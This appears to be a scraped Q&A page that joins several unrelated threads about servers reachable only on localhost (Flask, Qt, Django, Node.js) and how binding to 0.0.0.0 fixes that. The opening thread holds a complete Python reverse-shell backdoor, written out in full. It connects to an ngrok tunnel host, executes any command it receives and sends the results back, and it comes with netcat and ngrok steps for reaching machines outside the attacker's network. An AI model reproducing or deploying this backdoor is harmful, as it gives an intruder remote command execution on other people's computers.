i create a reverse shell with python and i have a problem with my router in port forwarding.
I don't have any static ip.
In router:
Protocol: TCP
Lochealipaddr: 192.168.1.10
Localport: 8090
Wanipaddr: ---
Wanport: 8090
state: enable
in my python script i cant bind on my wan ip address
ST.bind((Wanipaddr, 8090))
if i binding on localipaddr my reverse shell client can't connect to the server
whats my problem solution??
thanks
if you want to use your backdoor to receive connections outside LAN use ngrok
example:
1- lets listen on port 4444:
nc -lp 4444
2- after ngrok is installed you will run this command:
ngrok tcp 444
3- now find the ngrok address
ngrok address
4- use your ngrok address to the client connect
# backdoor.py
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = '0.tcp.ngrok.io'
PORT = 12969
s.connect((HOST, PORT))
while True:
conn = s.recv(2048).decode()
if conn[:3] == 'cd ':
os.chdir(conn[3:])
cmd = ''
else:
proc = subprocess.Popen(conn, stdout=subprocess.PIPE,stderr=subprocess.PIPE, stdin=subprocess.DEVNULL, shell=True)
stdout, stderr = proc.communicate()
cmd = stdout+stderr
cmd += str('\n'+os.getcwd()).encode()
s.send(cmd)
5- now you can connect with anyone outside your network
shell
It sounds like your router is configured to forward requests from the internet on port 8090 to your host (assuming you have the correct LAN IP). Perhaps just try binding to 0.0.0.0.
From wikipedia, it fits this context:
A way to specify "any IPv4 address at all". It is used in this way when configuring servers (i.e. when binding listening sockets).
In other words, you're telling your server to essentially listen on every available network interface (on that port).
Related
This question already has answers here:
Configure Flask dev server to be visible across the network
(17 answers)
Closed 1 year ago.
I have flask running in a daemon on my Raspi.
#app.route("/cmd",methods = ['POST', 'GET'])
def cmd():
if request.method == 'GET':
order_obj = request.args.to_dict(flat=True)
else:
order_obj = request.get_json(force=True)
response = jsonify(controller_obj.act_on_order(order_obj))
response.headers.add('Access-Control-Allow-Origin', '*')
return response
app.run(port=8087, debug=config.DEBUG, use_reloader=False)
When I run this app, I can see it is listening on port 8087:
pi#brs-tv:~/brs $ sudo netstat -lptu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 localhost:8087 0.0.0.0:* LISTEN 4133/python
When I telnet to the port locally using localhost, it works fine.
pi#brs-tv:~/brs $ telnet localhost 8087
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cmd
But when I telnet locally to its local address, I get connection refused:
pi#brs-tv:~/brs $ telnet brs-tv.local 8087
Trying 127.0.1.1...
telnet: Unable to connect to remote host: Connection refused
Is this a Rpi thing, or a Flask thing?
It turns out it is a Flask thing.
host (Optional[str]) – the hostname to listen on. Set this to '0.0.0.0' to have the server available externally as well. Defaults to
'127.0.0.1' or the host in the SERVER_NAME config variable if present.
So, fixing my Flask run call:
app.run(host="0.0.0.0", port=config.CONTROLLERS[whoami]["port"],
debug=config.DEBUG, use_reloader=False)
Now, my port is listening to the rest of the world:
pi#brs-tv:~ $ sudo netstat -lptu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8087 0.0.0.0:* LISTEN 1213/python
I can also now connect from another machine:
Ricos-vt220:~ % telnet brs-tv.local 8087
Trying fe80::3d7:b64:bb26:14e0...
telnet: connect to address fe80::3d7:b64:bb26:14e0: Connection refused
Trying 192.168.86.29...
Connected to brs-tv.local.
Escape character is '^]'.
GET /cmd
contents of serverside.py
import socket
s = socket.socket()
host = "127.0.0.1"
port = 9000
s.bind((host, port))
s.listen(5)
while True:
c, addr = s.accept()
print 'Got connection from', addr
c.send('Thank you for connecting')
c.close()
now when i open cmd and type
telnet 127.0.0.1 9000
The server works perfectly fine.
cmd shows display - Thank you for connecting
and shell shows display - Got connection from ('127.0.0.1', 54578)
But when I connect this over The WAN and type the same command on cmd from another computer while server on my computer is running fine it shows connection failed.
Why is this happening ???
Edit : I am a begginer in networking. So plz help me understand what's going wrong.
Because you're binding to 127.0.0.1 instead of an address on an external interface. Only the local computer can connect to this address, which is why it's called the "loopback address".
My computer's IP on the local network is 192.168.0.100, I start my QTcpServer with
if (!tcpServer->listen(QHostAddress::LocalHost, 1234)) {
When I try to connect to it with netcat 192.168.0.100 1234, the connection is refused, but netcat localhost 1234 succeeds.
At the same time, if I listen with netcat -l -p 1234, I can connect on both 192.168.0.100 and localhost without any problem.
This has me scratching my head, why is it happening?
In order to accept connections from the outside, you have to listen on 0.0.0.0, not on 127.0.0.1 or localhost. The latter will only allow connections coming from the same machine. It's also the value of QHostAddress::LocalHost.
So change the first argument to QHostAddress::Any and it should work.
localhost is on a separate network interface
you can use QHostAddress::Any to listen for external connections
I'm running OS X Mountain Lion on a machine with local IP address 192.168.1.6 (as reported by both the Network utility and ifconfig) and am running a local (Django) development web server on port 8000 that I would like to connect to from a virtual machine running a guest OS on the same machine.
On the host OS (ie, OS X running on the metal of the machine w/ address 192.168.1.6) I can connect to my test web server through the browser by navigating to 127.0.0.1:8000; or localhost:8000; but not when using the machine's local IP address. Here's what makes this extra confusing:
The router is not filtering the ports; and, just to be sure, I've set it to explicitly forward ports 8000 and 22 to 192.168.1.6; And speaking of port 22,
When I start the SSH service, I can connect (from the command line) via ssh 192.168.1.6
It's not a browser issue, because I also can't telnet to 192.168.1.6 port 8000 (connection refused) while I can telnet to 127.0.0.1 port 8000, and I can also telnet to 192.168.1.6 port 22
The firewall is set to off (as reported in System Preferences) but to be extra safe, I've also set an ipfw rule to allow everything through
Here are the ipfw rules:
00100 allow tcp from any to any dst-port 8000
65535 allow ip from any to any
Here is additional confirmation that the port is, indeed, being listened to by my test server:
netstat -an | grep 8000
tcp4 0 0 127.0.0.1.8000 *.* LISTEN
so what's going on here? Somehow port 22 is being treated differently than port 8000, but every place I can think to look for those differences I can't find any. Why can't I get into this machine's port 8000 using its local ip address?
When you start Django development server you need to give the address explicitly:
python manage.py runserver 192.168.1.6:8000
Or if you want the server to run on all interfaces you can use:
python manage.py runserver 0.0.0.0:8000
In other case Django development server defaults to running on the local interface only.
The problem for me was I accidentally quit the server whenever trying to copy the server address. So instead of using ctrl+C just write down the address into your browser.
I solved the issue.There are a few things you might be missing.Listing them below-
1.Once it starts the server, do not press Ctrl+C anyhow .u might be pressing it to copy to url and that accidently closes the server due to which it might be happening.
2.instead of http://127.0.0.1:8000/ ...change the port number to http://127.0.0.1:8080/ ...That would work.
3.Try changing the firewall setting and allow the app.
4.Try opening it with different browsers and incognito too.
The above steps helped solve my issue.Hope they help u too...:)
I installed node.js on a hosted Apache server. The simple server I placed on the server runs fine, but when I go to the website I cannot see the website.
I initially tested this on my local machine and it works fine, but I need this on a production website. How can I do this.
My Node.js code
[code]
// Load the net module to create a tcp server.
var net = require('net');
// Setup a tcp server
var server = net.createServer(function (socket) {
// Every time someone connects, tell them hello and then close the connection.
socket.addListener("connect", function () {
sys.puts("Connection from " + socket.remoteAddress);
socket.end("Hello World\n");
});
});
// Fire up the server bound to port 7000 on localhost
server.listen(1337, "localhost");
[/code]
// Put a friendly message on the terminal
console.log("TCP server listening on port 1337 at localhost.");
Then I run node test.js
Response : TCP server listening on port 1337 at localhost.
Then I go to www.mywebsite.com:1337
Oops! Google Chrome could not connect to www.mywebsite.com:1337
So I tried using the actual IP
server.listen(1337, "xx.xx.xx.xx");
And the URL
server.listen(1337, "http://mywebsite.com");
// this actually broke the server immediatly
So how can I do this?
You will need a firewall rule to allow incoming traffic.
iptables -A INPUT -p tcp --dport 1337 -j ACCEPT
and do not bind to localhost, but on the port only:
server.listen(1337/*, "localhost"*/);
http://nodejs.org/api/net.html#net_server_listen_port_host_backlog_callback
EDIT: This comments out the host, so your server will listen on all adresses (this is the same as:)
server.listen(1337);
If you still encounter problems, this is most likely a firewall problem.